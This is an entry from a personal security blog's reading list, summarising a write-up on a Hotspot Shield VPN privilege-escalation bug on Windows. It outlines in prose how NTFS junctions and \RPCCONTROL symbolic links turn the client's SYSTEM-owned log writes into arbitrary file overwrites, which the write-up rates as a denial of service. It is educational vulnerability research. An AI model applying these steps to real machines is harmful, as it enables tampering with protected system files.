About  Project Blog Resources

Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Hotspot Shield VPN Privilege Escalation - 281

Chen Erlich - cymptomPosted 5 Years Ago
  • James Forshaw showed techniques that abuse NTFS Junctions and Symbolic links to escalate privileges back in 2015. Since then, using this has became an extremely popular method for hacking Windows clients.
  • The client (running as SYSTEM) writes a log file to C:\ProgramData\Hotspot Shield\logs. However, this location can be altered by any user! So, what does this mean? Arbitrary write to any file, using the log file!
  • To exploit this, the following must be done:
    1. Delete all of the files in the logs folder.
    2. Create an NTFS Junction (soft link) to \RPCCONTROL object directory.
    3. Create a symbolic link between \RPCCONTROL\ and any destination file.
  • Although, because these are log files, this only results in a DoS because the content of the logs is not trivial to control to gain code execution. Still though, good find and explanation of the Windows bug that keeps on giving!

Maxwell DulinEmail me!TwitterGithubAdminBlog RSS FeedResources RSS Feed